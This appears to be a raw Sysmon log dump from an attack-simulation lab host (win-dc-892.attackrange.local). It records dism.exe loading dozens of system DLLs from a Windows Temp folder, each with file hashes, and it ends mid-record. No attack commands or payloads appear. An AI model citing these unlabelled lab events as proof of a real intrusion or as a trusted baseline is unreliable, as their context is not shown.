AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\CompatProvider.dllMD5=E5C1D020198EBEC1D5ABA640C9A600D0,SHA256=A80FD2846E05AB491BDAAFCE8854A04549A852066B82B90D757D9B6A44ADA8C8,IMPHASH=2CDD615C09EED7B572606B2A0C0EFD2Ftruetrue 23542300x8000000000000000197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.434{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\CbsProvider.dllMD5=D4A64C7C50D0C6BE9F8770177E2264BF,SHA256=E6505F9DBE17DF9E7E52B5FE1720E1F6482B25D262A47A320CF438C5FD5A5797,IMPHASH=99D5DC4FF67AB12670853DD4E32E8358truetrue 23542300x8000000000000000196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\AssocProvider.dllMD5=56CB83B3454882509791FBA62832BC87,SHA256=5B01524CC03B6EB58CC9E0FF479014EAF89EE7FDE2791BFF871BC90274D200AC,IMPHASH=83F73507B4613B09C6FA825535D8A81Etruetrue 23542300x8000000000000000195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\AppxProvider.dllMD5=8F6792DF9EC54934B76A68B1D7B66ECA,SHA256=E57CB2D5CEC5E1354F4E31CD08ADA02FCAA0E2DEA4B28C8F61683BFA3E875C05,IMPHASH=F1558CACACA712554EBD5926B4B3FE52truetrue 23542300x8000000000000000194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-winsvc-l1-1-0.dllMD5=09934F0F7227B9489D117C26EC20CD14,SHA256=CBE408A0AFF90986A6A7DDF022F96302B4FADD08A0C3C166CAC7A64D6ABF041D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-private-l1-1-1.dllMD5=484ED248F1A72C6E4E6F6C3F5A3339ED,SHA256=00E14515FE6FEBBF3C2CFC89A6F1A3D6F48B3E7A5EB08D50DADF69CE3F34CC47,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.418{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-private-l1-1-0.dllMD5=FEBE55EA884F3C1EE45ADE2734AA6BE6,SHA256=CD51DF334A600117133C9C8100DDE766D980456988FD333A40BE5A81C8092340,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-management-l2-1-0.dllMD5=0D45D811001E0A7683A2B7CA8A883874,SHA256=F44E2A85D7507159AE115C85C3497C57BE4ECB2D6ADDB30A534110266D56F92F,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-management-l1-1-0.dllMD5=C36912B3A28B06F5BB24FE9BE49DA4D3,SHA256=D737A832C0D595E8E52846C2D748B911D7155E372F43FBB10513CFDE0BBF83B7,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-core-l1-1-1.dllMD5=A86D518BCF3970C17A1768792FDF37FF,SHA256=AB5CC1B14D6BB708B5C87C2622DA886E2119A6997E08108CCE36080385DAEE71,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-service-core-l1-1-0.dllMD5=A329C75641638E2FFA11087F614FD4C1,SHA256=5071AA303D436407D195EF37889F018BE7E350DA5E690793587458D4C6D308DB,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-security-sddl-l1-1-0.dllMD5=C6C6C3E4D7CFA93246362901750A94D9,SHA256=6E274ABE823EF8B30629A99D9F942794C9FE6D003021A0C5085B49A7D8611DDE,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-security-provider-L1-1-0.dllMD5=207B5716605CA4850629F3E2FFFA07BB,SHA256=BE6E6284F69C76BE6366EA8D44D85BDBAB6A71DD42E8B5575CFDF671AD58DCA2,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-security-lsapolicy-l1-1-0.dllMD5=FE7AD7265E296947172B8C491E8109D2,SHA256=4D231AC65F0F54BFF45CACFFE7DF3109CF87F78D14960EC8F03654E605AC8ABF,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Security-Lsalookup-L2-1-1.dllMD5=EBD6475839F5C99FB8855A80E0FC2AF1,SHA256=F519C7AA6930DAC83A3045CEEE42F64F26FFC54254D5ABD1B0F7D99C47569A30,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Security-Lsalookup-L2-1-0.dllMD5=AC284A6251F5D26633AF48D918D09628,SHA256=F7A34B793AACF75DA4EAE843B6088C0BAAA8B835EA5F6A65E72EBD9A1479C8A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-security-cryptoapi-l1-1-0.dllMD5=DE0A49D4B2E9A5FA6762BD191C622B32,SHA256=AB12FEAF15CB313812B01AFE1198B62E72F7702D140830ABAD2CFB6251E82A7C,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-security-base-l1-1-0.dllMD5=DC4B661366FEAA4ED54FB1004D9E7A3D,SHA256=B4018F8F249CE087DB46F61A0C2E947248A5B71576F511F0B3650433607BC663,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-EventLog-Legacy-L1-1-0.dllMD5=B8B7B02C3C66638EC0BDF49BCF04A680,SHA256=5D1103E89199731DFFF7BF89D7F6484C038D47CC04F730CD5233EDE488272E6A,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Eventing-Provider-L1-1-0.dllMD5=FEAA05CE6CCB92AA7B2A2C58C049891A,SHA256=31A4AE262E179DF4CA406E1AF90F651935657BB5FD990C675C67E37D5B834CFE,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Eventing-Legacy-L1-1-0.dllMD5=88450242D5350529CC8E46FD9C3F3B7B,SHA256=312B6BFC89B551F2C4E8FEDAB316DBE01F190CD5E67091AAFB0E6F67616DC745,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Eventing-Controller-L1-1-0.dllMD5=00A27A81EAAE90C9CED7063013877357,SHA256=DC4EE086FC046E1D7A291EA3B8B13E77B7A252B5C283B8F6C9CEC729070B7822,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-eventing-consumer-l1-1-0.dllMD5=61958A4BE8F944BAFB29DF8009541FCD,SHA256=3B7CB5622BEAC7D633A84EE2F7336C8DE1D3D1AA10577D98020081AB67761FAD,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-Eventing-ClassicProvider-L1-1-0.dllMD5=8500E093D6B36DF1AF271F6EB34227CA,SHA256=99E2CD36104D3EFD4DEC88AD0F4BED1FD1BBFA97CC4FB29DB7F7136290DD6B70,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-devices-config-L1-1-1.dllMD5=5A03B636125C21AB918D2CB04843DBA8,SHA256=C914CD6FE6C7B16533763BC789EDAF67D7A19C26514C927572051C4379C79FC0,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-devices-config-L1-1-0.dllMD5=0C61A8D9CF9BBF6D771BEF0FF4A43E23,SHA256=66807B95E13944D52E9A7AA1F1A41E632FAA46F6B48F98451618DB3845622577,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.402{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-xstate-l2-1-0.dllMD5=56A386E38B637FCD96CED04CEFBCF8DE,SHA256=A5BE1E3C71A3A5C8EEF4BFAD9D0BADC97BA47B2B9911CED4BD1B8F65BB8DCB77,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-xstate-l1-1-0.dllMD5=6A982D13DDB295E59F90FF23EDD2E60F,SHA256=3617DBCADFE370463B4DBB91C1C6222923F16EC362DE29C2CA3AE4E72C9ABB64,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-wow64-l1-1-0.dllMD5=AE7573E1DC370B9A8FEBCC17A6C82FF8,SHA256=59A473D1AD7C181C89AF00B966CD107F1846CDC526009C4807A1EAE3DCB3731D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-version-l1-1-0.dllMD5=5CB34501C2D784D31281FD526B0BB963,SHA256=E45B73AF0C35F05B01CADF6BD4F67C1497586F4C4F9A16F0448BA751E16C4596,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-util-l1-1-0.dllMD5=212DA9E9AD6BB61A3554A4174BA558CF,SHA256=01291D3895EC5BB0E658F91FE1512AADCBB6D8F1154BC6023076554AFA05AC1D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-url-l1-1-0.dllMD5=198A08F8150D7575CC207CFFCF67D66C,SHA256=86F6DA0F1D075B7E1678DF71689948FEC334CFB10316FEB40E5107135548F9B4,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-timezone-l1-1-0.dllMD5=4D7C132D9742FFA44248B1BBF32020FB,SHA256=58A65C1938DCDF64D2930B037E9D133A5ACDF46365835782869D3216D3CF2CED,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-threadpool-private-l1-1-0.dllMD5=A9BC53B62CD4B269B8385ADBE0AE808D,SHA256=A30003AB0C020E433CC5296E7E150BB11820395D439062FF7FD6D7F449C4C5B3,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-threadpool-legacy-l1-1-0.dllMD5=CAC86F4298EB2D239410B3338780DC34,SHA256=1D99842180A612D63F1A8B137A9BF0375B7113AAB325916BA4781AB8A7B68E7D,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-threadpool-l1-2-0.dllMD5=D32DDF80AB3F1F96F431E5672DC1F387,SHA256=E2F0F0D46082ED40D042BCCD47F4E917707CF884672C5919116126914FAD4572,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-sysinfo-l1-2-1.dllMD5=E83097DFE144367FA2231828F9FD89A6,SHA256=69FA978126192DBAB6AF11C9878D9C2BD1FD7E3FC899300244DFA4A1AC7ACA31,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-sysinfo-l1-2-0.dllMD5=8D842EBFFA7803451A3AC7D6907A6AD9,SHA256=808C22A733B5F6A4E601605DCF4043C9952CEBE825FF2622097FC5B4FACF682A,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-sysinfo-l1-1-0.dllMD5=376E34D4A8F94C94FFF063810717612D,SHA256=5285A11016967E2017A8187882579CBD722371D0B7497B356149FC447160A521,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-synch-l1-2-0.dllMD5=E19F4FA6A6313F00ADE8AF26649A0BA1,SHA256=386F6CC0C3CE0C904A44A2FDDD11B2E5EA7782B08E69FD961DA5BE3C32BA5C26,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-synch-l1-1-0.dllMD5=95088E453B41A8B50E7340E6DE9CD09C,SHA256=E4938C16CA5FC7A8C9D87E4201FA2F28992026F5858F36A2A44EA22B5BD0889F,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-stringloader-l1-1-1.dllMD5=FE1D00B19175DE6E9729F709C508DD6B,SHA256=D726F32AEB323F4DEA55D35441D1FF06BF3E212846A6B86D9ADC8F9DD1307B57,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-stringansi-l1-1-0.dllMD5=43F8D61E2EE0E253B973EFED0B3EBC8D,SHA256=1B9FA225A474D42FF8360141C8BC1EE1E7310958910931AC8E5A213E957700BD,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-string-obsolete-l1-1-0.dllMD5=92C0A4E592B5D773C562A36CBA4E6E47,SHA256=5191E82E921398310FE9FD333F5CA44E6233358499EDD5B33BF8E9F0C9D3B88E,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.387{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\API-MS-Win-core-string-l2-1-0.dllMD5=3E1902AF98905F00E62B1EC827EB0FC2,SHA256=503443DBF6E6E481EA1C661109CE17B3D55C4FEA001D77F11CD032BDDF64FD29,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-string-l1-1-0.dllMD5=D30D4587D051D288D1023DB0D826295A,SHA256=DFE66C8C205C95274565BADB7B3C19043917F6CD07A8DE34CE241EFFF9EA6676,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-shutdown-l1-1-0.dllMD5=1D8D1283F8279BDDACF8745AEDA3DB2A,SHA256=21BF3432160DD9851CAAC716DF3A41E39428A84BA9B9D3C63CDD300CB6928300,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-shlwapi-obsolete-l1-1-0.dllMD5=33BEFB60C3DC3E93FCE54A0515100181,SHA256=24B3FA4C5E8AB463BD2CFB704D7BFA7E8429726852EF582F94E44D7691BDD1FB,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-shlwapi-legacy-l1-1-0.dllMD5=699CDC66AA090D13EFF451F2006944CF,SHA256=6212B2B8CF5533F9DB6E366BBADED7A8D6EAD6667EA6A425B6987102669D8D96,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-rtlsupport-l1-1-0.dllMD5=F9672F68330CD16B0D1FA3A75B123AE8,SHA256=C5938839A3DFFBFBFEF432D0A95D0773375B4758FC160EDD04383A4B4273A18B,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-registry-l2-1-0.dllMD5=BBC015F33C0C3C2F9FC58C466BF8A30A,SHA256=1ED3511DC98353CA8E9B22A40C318BBD24484C25C171886B06B22AFD396ACFE8,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-registry-l1-1-0.dllMD5=D132FADCBF190A1C68070E6D488E67D7,SHA256=E6F51C07641EF931C4F97E5D966242BB96A156A603A7769BEAE0EA61E9E25486,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-realtime-l1-1-0.dllMD5=792C54B79CA333ABBB51BE66815A98CF,SHA256=1E3B3505560AB3E641C386473A83AA194D94CD5BC6CC4FA718D003D1FF899601,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT AUTHORITY\SYSTEMC:\Windows\System32\dism.exeC:\Windows\Temp\8F586512-5116-465F-912A-2BAD8D329B2A\api-ms-win-core-profile-l1-1-0.dllMD5=C4E53285E8C51DCBEFF5098215759D69,SHA256=320A6138FE915BE7E83F4CDC2024531948185C3BFC939CB367A53F1AA74BFB2C,IMPHASH=00000000000000000000000000000000truetrue 23542300x8000000000000000144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:54.371{266CAFBE-642C-6064-8C02-00000000AD01}4772NT 